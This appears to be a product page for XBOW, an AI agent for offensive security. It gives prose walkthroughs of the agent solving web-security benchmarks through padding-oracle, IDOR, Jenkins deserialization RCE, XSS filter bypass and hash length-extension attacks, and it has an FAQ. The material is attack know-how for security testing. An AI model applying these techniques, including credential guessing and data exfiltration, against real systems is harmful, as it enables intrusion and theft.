
Boosting offensive security with AI
XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks
PortSwigger Labs
PentesterLab Exercises
Novel Benchmarks
See XBOW at work
XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.
These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data, click here.
Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle
Don't roll your own crypto—or XBOW might break it. This trace shows XBOW pulling off a classic Padding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able to decrypt the secret one byte at a time and use it to register a new user.
- XBOW begins by verifying the presence of the CAPTCHA cookie and understanding its structure, guessing from the size (256-bit) that it may use AES
- XBOW begins its attempt to implement an attack to decrypt the cookie, refining its code and debugging issues it encounters
- One of its attempts reveals that the server responds with
Invalid paddingrather thanInvalid CAPTCHAin some cases—a crucial feature of a padding oracle vulnerability - After noticing that some cookie values trigger a
500 Internal Server Error, XBOW explores possible non-cryptographic attacks like SSTI - XBOW decides to execute a full CBC padding attack, and successfully decrypts the CAPTCHA cookie, but is unable to modify it to bypass authentication
- It realizes that the attack needs to target the CAPTCHA input (rather than modifying the cookie), and uses the decrypted cookie to create a new user and obtain the flag
Copied to clipboard!
Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API
Even when we entirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site—finding one that holds the flag.
- After basic reconnaissance on the login page, XBOW guesses likely usernames and passwords and gains authenticated access
- Once inside, it scans for likely endpoints, and finds two interesting targets:
/add_prescriptionand/view_prescriptions - It turns its attention to analyzing the client-side JavaScript, and finds a
/graphqlendpoint that includes aflagfield - XBOW uses GraphQL introspection to understand the API schema, discovering a
getPrescriptionsquery type; from the presence of auserIdparameter it surmises that the app may be vulnerable to Insecure Direct Object Reference (IDOR) - With this knowledge, it enumerates the prescriptions for other user IDs, exploiting the IDOR vulnerability and capturing the flag
Copied to clipboard!
Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit
After a benchmark bug made this "Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but the compromised server as well. Its final solution—a Python program that exploits XML deserialization to deploy an embedded bash script, stealing secrets from running processes' command lines—is a thing of beauty.
- XBOW checks for public exploits using
searchsploit, but ultimately opts to write its own code to exploit the issue - When its initial attempts don't succeed, XBOW shows heroic perseverance in the face of very long Java stack traces, using the server's error messages to identify and fix issues
- After extensive debugging, XBOW determines the correct format expected by the server, and successfully submits a malicious job that will run
/usr/local/bin/exfiltrateon the server to exfiltrate the flag–but does not receive the flag due to a missing environment variable in the benchmark setup - Undeterred, XBOW uses its newfound ability to remotely execute code to debug the server environment itself
- By launching the exfiltration binary in the background and monitoring activity on the server, it spots the flag in the output of
ps, allowing it to solve the benchmark
Copied to clipboard!
Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)
In this novel XBOW benchmark, XBOW detects one of the OWASP Top 10 most common vulnerabilities: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW is able to find a bypass and exploit the XSS by using HTML entities encoding.
- XBOW starts analyzing the application, examining the HTML of the main page and identifying an
/xss20endpoint - Based on the benchmark description, XBOW looks for potential XSS vulnerabilities and identifies a vulnerable parameter
name - It detects that multiple characters are filtered by the application, making it difficult to craft a valid payload. XBOW tries to circumvent the protection with
url-encodedcharacters to bypass server-side filtering - XBOW realizes that the XSS filter appears to be checking for specific characters rather than using a comprehensive sanitization approach
- After systematically attempting different techniques, XBOW decides to try
HTML Entities encodingand successfully bypasses the filter to complete the benchmark
Copied to clipboard!
Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack—all without access to the tutorial given to human solvers.
- XBOW first fetches the provided Ruby source code for the app, and learns from reading it that the app's
/getfileendpoint can be used to read arbitrary files—but only if accompanied by a valid SHA-256 signature - Recognizing that it needs to execute a hash extension attack, XBOW attempts to install
hash_extender, but finds that it is not available throughapt - It also tries to implement the attack using Python's standard
hashliblibrary, but finds that its API does not offer sufficient control over the internal SHA-256 state variable it needs to manipulate - After another unsuccessful attempt to obtain and use a third-party tool, XBOW decides to write its own SHA-256 implementation from scratch
- Its implementation of SHA-256 is correct, but its initial attempts to forge a signature and sign a payload that obtains the flag using directory traversal do not work
- After debugging the issue and hypothesizing that its earlier mistake was due to missing URL encoding, XBOW writes a Python script to retry the attack with a variety of key lengths—and succeeds on its next try
Copied to clipboard!
Team
Security, AI, and Engineering
Nico Waisman
Head of Security
Albert Ziegler
Head of AI
Andrew Rice
Head of Engineering
Aqeel Siddiqui
Head of Product & Customer Success
Jordan McTaggart
Head of Finance & BizOps
Zac Wallis
Head of Talent
Alex Gatzlaff
Account Executive
Alvaro Muñoz
Security Researcher
Brendan Coll
Research Engineer
Brendan Dolan-Gavitt
AI Researcher
Daniel Wagner
Research Engineer
Diego Jurado
Security Researcher
Ewan Mellor
Research Engineer
Fernando Russ
Research Engineer
Ian Campbell
Research Engineer
Javier Gil
Security Researcher
Joanna Clifton
Operations
Joel Noguera
Security Researcher
Johan Rosenkilde
AI Researcher
Leandro Barragan
Security Researcher
Max Schaefer
AI Researcher
Meurig Thomas
Research Engineer
Nicolas Trippar
Security Researcher
Thomas Bolton
AI Researcher
We are recruiting.
Blog
Updates and opinions from the team
July 31, 2025 - By Nico Waisman
The campaign is not available in your country: XBOW discovered an SQLi while attempting to bypass geolocation restrictions.
As much as an AI might get discouraged, it’s also incredibly relentless in its pursuit.
Read postJuly 28, 2025 - By Alvaro Muñoz
Another Byte Bites the Dust - How XBOW Turned a Blind SSRF into a File Reading Oracle
A complete arbitrary local file read vulnerability achieved through an ingenious byte-by-byte exfiltration technique.
Read postJuly 24, 2025 - By Alvaro Muñoz
Beyond the Bands: Exploiting TiTiler’s Expression Parser for Remote Code Execution
A methodical analysis of TiTiler's API endpoints and its expression parser, leading to arbitrary Python code execution on the server.
Read postFrequently asked questions
Benchmarks
What do you consider a “benchmark”?
A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Many challenges in CTF contests do not qualify because they are brainteasers rather than reflecting a realistic web security scenario.
Where did XBOW get its collection of benchmarks?
XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources include leading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Some benchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.
The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?
The PortSwigger labs detect automatically whether you have solved the lab or not. However, we wanted all benchmarks to have the same crisp success criterion which can be checked by our infrastructure. So we introduced a flag and a mechanism for returning it.
Could you provide more information about the novel XBOW benchmarks?
XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in any training data. The benchmarks are representative of many vulnerability classes, and varying degrees of difficulty.
Will the novel XBOW benchmarks be released?
Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarks to set a new standard for the evaluation of security tools.
How many benchmarks does XBOW have?
XBOW has collected a corpus of thousands of benchmarks, both for the purpose of evaluating performance, and for improving performance.
Where can I find more details about the benchmarks that XBOW solved?
We provide more details to back up the results reported on this website. See here for the benchmarks that were attempted, and which were solved.
Technology
How does the AI inside XBOW work?
It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Aside from general guidance that is identical for every task, the only directions given to XBOW are the basic benchmark description.
As a growing startup, this intellectual property is our main asset, so we cannot share the details.
Are the example traces shown edited?
The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.
Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?
Yes, we have run experiments by blanking out the descriptions and that works fine. Without flags as a goal, XBOW decides on its own when it has finished. You can prompt it to be more or less aggressive - for example, when it discovers a SQL injection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or just stop and report the core problem.
Is XBOW useful for everyone or does it require any sort of specific knowledge?
XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security or AI expert to use it—a lot of deep security knowledge is baked into the XBOW product. This is the magic of our team, combining such security expertise with AI and engineering skills.
Responsible AI
How will you ensure your technology won't be misused?
We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone application outside our control.